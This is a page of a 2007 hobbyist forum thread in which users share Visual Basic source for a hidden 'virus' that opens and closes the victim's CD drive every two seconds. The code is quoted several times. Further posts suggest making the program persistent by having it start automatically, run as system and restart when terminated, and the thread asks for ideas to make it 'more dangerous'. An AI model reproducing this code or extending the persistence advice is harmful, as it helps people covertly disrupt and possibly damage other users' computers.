Page 3 of 4

Posted: Fri Aug 31, 2007 1:55 am
by treborguile
that is really not the way of the hacker. 8)

Posted: Fri Aug 31, 2007 11:11 am
by jack krauser
treborguile wrote:that is really not the way of the hacker. 8)
you mean to broke his computer :twisted:

Posted: Fri Aug 31, 2007 12:36 pm
by <<D.A.>>
it's ain't the way of a hacker... IT'S THE WAY OF A CRAZY PSYCHO!!!!!! :twisted: :twisted: :twisted: :twisted:

Posted: Fri Aug 31, 2007 6:24 pm
by jack krauser
<<D.A.>> wrote:it's ain't the way of a hacker... IT'S THE WAY OF A CRAZY PSYCHO!!!!!! :twisted: :twisted: :twisted: :twisted:
hehehe :twisted: :twisted: :twisted: :twisted: :twisted:

Posted: Sat Sep 01, 2007 2:05 am
by treborguile
jack krauser wrote:
<<D.A.>> wrote:it's ain't the way of a hacker... IT'S THE WAY OF A CRAZY PSYCHO!!!!!! :twisted: :twisted: :twisted: :twisted:
hehehe :twisted: :twisted: :twisted: :twisted: :twisted:
hahahahaha 8)

Posted: Sat Sep 01, 2007 10:27 am
by jack krauser
treborguile wrote:
jack krauser wrote:
<<D.A.>> wrote:it's ain't the way of a hacker... IT'S THE WAY OF A CRAZY PSYCHO!!!!!! :twisted: :twisted: :twisted: :twisted:
hehehe :twisted: :twisted: :twisted: :twisted: :twisted:
hahahahaha 8)
hey do you know any other good virus? not fake :wink:

.

Posted: Sat Sep 22, 2007 8:08 am
by koolpop0
cdaudio don't work for me help?

Re: .

Posted: Sat Sep 22, 2007 8:44 am
by jack krauser
koolpop0 wrote:cdaudio don't work for me help?
what do you mean it didn't work? :?

Re: source code for an excellent virus(VB)

Posted: Sat Sep 22, 2007 9:10 am
by Necklord
treborguile wrote:Ok this virus is very nasty...it causes the CD drive 2 eject and load at intervals of 2 seconds,u cant stop it directly.......it can even damage ur CD drives....ok here goes the code ....this shud b coded in VB.....


Private Declare Function mciSendString Lib "winmm.dll" Alias _
"mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, _
ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Dim retvalue As Long

Private Sub Form_Load()
Form1.Hide
t.interval=2000
End Sub

Private Sub t_Timer()
Static a As Boolean
a = Not (a)
Select Case a
Case True
retvalue = mciSendString("set CDAudio door open", returnstring, 127, 0)
Case False
retvalue = mciSendString("set CDAudio door closed", returnstring, 127, 0)
End Select
End Sub
Oke, bro ... This code work 100%. But, if you use this code:
1. Computer'll be slower.
2. You cann't put another code, like code to make virus duplicate. Because, program'll focus to this code.

If you wan't make powerfull virus i've some tricks. Make virus like KSPoold (can login as system). And make it to start automaticly. So, if user terminate it, it'll start again. Then, put your code more free. Because, your virus'll save!! (You won't put the lock task manager code)

Re: source code for an excellent virus(VB)

Posted: Sat Sep 22, 2007 11:27 am
by jack krauser
Necklord wrote:
treborguile wrote:Ok this virus is very nasty...it causes the CD drive 2 eject and load at intervals of 2 seconds,u cant stop it directly.......it can even damage ur CD drives....ok here goes the code ....this shud b coded in VB.....


Private Declare Function mciSendString Lib "winmm.dll" Alias _
"mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, _
ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Dim retvalue As Long

Private Sub Form_Load()
Form1.Hide
t.interval=2000
End Sub

Private Sub t_Timer()
Static a As Boolean
a = Not (a)
Select Case a
Case True
retvalue = mciSendString("set CDAudio door open", returnstring, 127, 0)
Case False
retvalue = mciSendString("set CDAudio door closed", returnstring, 127, 0)
End Select
End Sub
Oke, bro ... This code work 100%. But, if you use this code:
1. Computer'll be slower.
2. You cann't put another code, like code to make virus duplicate. Because, program'll focus to this code.

If you wan't make powerfull virus i've some tricks. Make virus like KSPoold (can login as system). And make it to start automaticly. So, if user terminate it, it'll start again. Then, put your code more free. Because, your virus'll save!! (You won't put the lock task manager code)
any other tricks?

Re: source code for an excellent virus(VB)

Posted: Sun Sep 23, 2007 12:35 pm
by Necklord
jack krauser wrote:
Necklord wrote:
treborguile wrote:Ok this virus is very nasty...it causes the CD drive 2 eject and load at intervals of 2 seconds,u cant stop it directly.......it can even damage ur CD drives....ok here goes the code ....this shud b coded in VB.....


Private Declare Function mciSendString Lib "winmm.dll" Alias _
"mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, _
ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Dim retvalue As Long

Private Sub Form_Load()
Form1.Hide
t.interval=2000
End Sub

Private Sub t_Timer()
Static a As Boolean
a = Not (a)
Select Case a
Case True
retvalue = mciSendString("set CDAudio door open", returnstring, 127, 0)
Case False
retvalue = mciSendString("set CDAudio door closed", returnstring, 127, 0)
End Select
End Sub
Oke, bro ... This code work 100%. But, if you use this code:
1. Computer'll be slower.
2. You cann't put another code, like code to make virus duplicate. Because, program'll focus to this code.

If you wan't make powerfull virus i've some tricks. Make virus like KSPoold (can login as system). And make it to start automaticly. So, if user terminate it, it'll start again. Then, put your code more free. Because, your virus'll save!! (You won't put the lock task manager code)
any other tricks?
Use private lib (vb)

Re: source code for an excellent virus(VB)

Posted: Sun Sep 23, 2007 2:53 pm
by jack krauser
Necklord wrote:
jack krauser wrote:
Necklord wrote: Oke, bro ... This code work 100%. But, if you use this code:
1. Computer'll be slower.
2. You cann't put another code, like code to make virus duplicate. Because, program'll focus to this code.

If you wan't make powerfull virus i've some tricks. Make virus like KSPoold (can login as system). And make it to start automaticly. So, if user terminate it, it'll start again. Then, put your code more free. Because, your virus'll save!! (You won't put the lock task manager code)
any other tricks?
Use private lib (vb)
what is private lib? :? :? it's a programme? :?

Re: source code for an excellent virus(VB)

Posted: Thu Sep 27, 2007 6:45 am
by treborguile
jack krauser wrote:
Necklord wrote:
jack krauser wrote: any other tricks?
Use private lib (vb)
what is private lib? :? :? it's a programme? :?
hahaha upgrading it will be nice
post ur ideas guys to make this virus more dangerous...

Re: source code for an excellent virus(VB)

Posted: Sat Sep 29, 2007 6:37 pm
by jack krauser
treborguile wrote:
jack krauser wrote:
Necklord wrote: Use private lib (vb)
what is private lib? :? :? it's a programme? :?
hahaha upgrading it will be nice
post ur ideas guys to make this virus more dangerous...
more dangerous :shock: :twisted: :twisted: :twisted: :twisted:

Posted: Sun Sep 30, 2007 5:36 am
by treborguile
:lol: :lol: :lol: :lol: :lol: 8)